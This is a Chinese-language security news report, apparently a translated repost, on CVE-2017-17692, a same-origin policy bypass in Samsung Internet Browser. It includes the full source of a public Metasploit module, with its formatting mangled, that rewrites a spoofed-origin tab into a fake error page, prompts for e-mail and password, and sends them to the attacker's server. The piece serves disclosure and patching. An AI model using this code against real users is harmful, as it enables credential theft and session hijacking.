三星手機瀏覽器被曝同源策略繞過漏洞，影響三億設備

三星手機預裝的瀏覽器應用發現重要漏洞，如果用戶訪問攻擊者控制的站點，攻擊者就可以從瀏覽器中的不同標籤頁竊取用戶數據。該漏洞影響數億三星安卓設備。

簡介

該漏洞CVE號為CVE-2017-17692，實際上是一種存在於主流的三星手機瀏覽器中的同源策略（Same Origin Policy，SOP）繞過漏洞，影響5.4.02.3以前版本。

同源策略

同源策略是瀏覽器的一種安全特徵，所有支持JavaScript 的瀏覽器都會使用這個策略。同源是指，域名，協議，埠相同。當一個瀏覽器的兩個tab頁中分別打開來 A和B的頁面,當瀏覽器的A tab頁執行一個腳本的時候會檢查這個腳本是屬於哪個頁面的,只有和A同源的腳本才會被執行。如果非同源，那麼在請求數據時，瀏覽器會在控制台中報一個異常，提示拒絕訪問。換句話說，同源策略確保了來自源A的JS代碼不能訪問源B的網頁的特徵。

漏洞

Dhiraj Mishra發現三星網路瀏覽器中存在同源策略繞過漏洞，允許惡意網站竊取不同標籤頁中的用戶密碼、cookie等數據。Rapid7的研究人說說，當三星網路瀏覽器通過JS操作打開一個給定的域的新標籤頁，JS代碼可以任意改寫頁面的內容。

也就是說JS繞過了同源策略，將一個站點的JS代碼在另一個站點執行。在這個過程中，攻擊者首先要在任意的域內插入普通的JS代碼，讓用戶能夠訪問攻擊者控制的web頁面。攻擊的結果是，攻擊者可以複製你的session cookie、劫持session，讀寫web郵件等等。

官方回應

Mishra將漏洞報告給三星後，三星回應稱該應用已經內置於即將發布的Galaxy Note 8中，他們會在10月的時候通過應用商店對應用進行更新。同時，Rapid 7團隊發布了一個利用該漏洞的Metasploit Framework和一個視頻來嚴實該攻擊。因為Metasploit利用框架已經發布了，所以不懂技術的人也可以利用該漏洞，解決辦法就是將應用升級到5.4.02.3以上版本。

附1、Metasploit利用代碼(https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/samsung_browser_sop_bypass.rb)

1 ##n2 # This module requires Metasploit: https://metasploit.com/downloadn3 # Current source: https://github.com/rapid7/metasploit-frameworkn4 ##n5n n6 class MetasploitModule < Msf::Auxiliaryn7 include Msf::Exploit::Remote::HttpServern8n n9 def initialize(info = {})n10 super(n11 update_info(n12 info,n13 Name => Samsung Internet Browser SOP Bypass,n14 Description => %q(n15 This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in then16 Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices.n17 By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gathern18 credentials via a fake pop-up.n19 ),n20 License => MSF_LICENSE,n21 Author => [n22 Dhiraj Mishra, # Original discovery, disclosuren23 Tod Beardsley, # Metasploit modulen24 Jeffrey Martin # Metasploit modulen25 ],n26 References => [n27 [ CVE, 2017-17692 ],n28 [URL, http://fr.0day.today/exploit/description/28434]n29 ],n30 DisclosureDate => Nov 08 2017,n31 Actions => [[ WebServer ]],n32 PassiveActions => [ WebServer ],n33 DefaultAction => WebServern34 )n35 )n36n n37 register_options([n38 OptString.new(TARGET_URL, [n39 true,n40 The URL to spoof origin from.,n41 http://example.com/n42 ]),n43 OptString.new(CUSTOM_HTML, [n44 true,n45 HTML to display to the victim.,n46 This page has moved. Please <a href="#">click here</a> to redirect your browser.n47 ])n48 ])n49n n50 register_advanced_options([n51 OptString.new(CUSTOM_JS, [n52 false,n53 "Custom Javascript to inject as the go() function. Use the variable x to refer to the new tab.",n54 n55 ])n56 ])n57n n58 endn59n n60 def runn61 exploit # start http servern62 endn63n n64 def evil_javascriptn65 return datastore[CUSTOM_JS] unless datastore[CUSTOM_JS].blank?n66 js = <<-EOSn67 setTimeout(function(){n68 x.document.body.innerHTML=<h1>404 Error</h1>+n69 <p>Oops, something went wrong.</p>;n70 a=x.prompt(E-mail,);n71 b=x.prompt(Password,);n72 var cred=JSON.stringify({user:a,pass:b});n73 var xmlhttp = new XMLHttpRequest;n74 xmlhttp.open(POST, window.location, true);n75 xmlhttp.send(cred);n76 }, 3000);n77 EOSn78 jsn79 endn80n n81 def setupn82 @html = <<-EOSn83 <html>n84 <meta charset="UTF-8">n85 <head>n86 <script>n87 function go(){n88 try {n89 var x = window.open(#{datastore[TARGET_URL]});n90 #{evil_javascript}n91 } catch(e) { }n92 }n93 </script>n94 </head>n95 <body onclick="go()">n96 #{datastore[CUSTOM_HTML]}n97 </body></html>n98 EOSn99 endn100n n101 def store_cred(username,password)n102 credential_data = {n103 origin_type: :import,n104 module_fullname: self.fullname,n105 filename: msfconsole,n106 workspace_id: myworkspace_id,n107 service_name: web_service,n108 realm_value: datastore[TARGET_URL],n109 realm_key: Metasploit::Model::Realm::Key::WILDCARD,n110 private_type: :password,n111 private_data: password,n112 username: usernamen113 }n114 create_credential(credential_data)n115 endn116n n117 # This assumes the default schema is being used.n118 # If its not that, itll just display the collected POST data.n119 def collect_data(request)n120 cred = JSON.parse(request.body)n121 u = cred[user]n122 p = cred[pass]n123 if u.blank? || p.blank?n124 print_good("#{cli.peerhost}: POST data received from #{datastore[TARGET_URL]}: #{request.body}")n125 elsen126 print_good("#{cli.peerhost}: Collected credential for #{datastore[TARGET_URL]} #{u}:#{p}")n127 store_cred(u,p)n128 endn129 endn130n n131 def on_request_uri(cli, request)n132 case request.method.downcasen133 when get # initial connectionn134 print_status("#{cli.peerhost}: Request #{request.method} #{request.uri}")n135 print_status("#{cli.peerhost}: Attempting to spoof origin for #{datastore[TARGET_URL]}")n136 send_response(cli, @html)n137 when post # must have fallen for itn138 collect_data(request)n139 elsen140 print_error("#{cli.peerhost}: Unhandled method: #{request.method}")n141 endn142 endn143n144 endn

本文翻譯自： https://thehackernews.com/2017/12/same-origin-policy-bypass.html，如若轉載，請註明原文地址： http://www.4hou.com/info/news/9535.html 更多內容請關注「嘶吼專業版」——Pro4hou

推薦閱讀：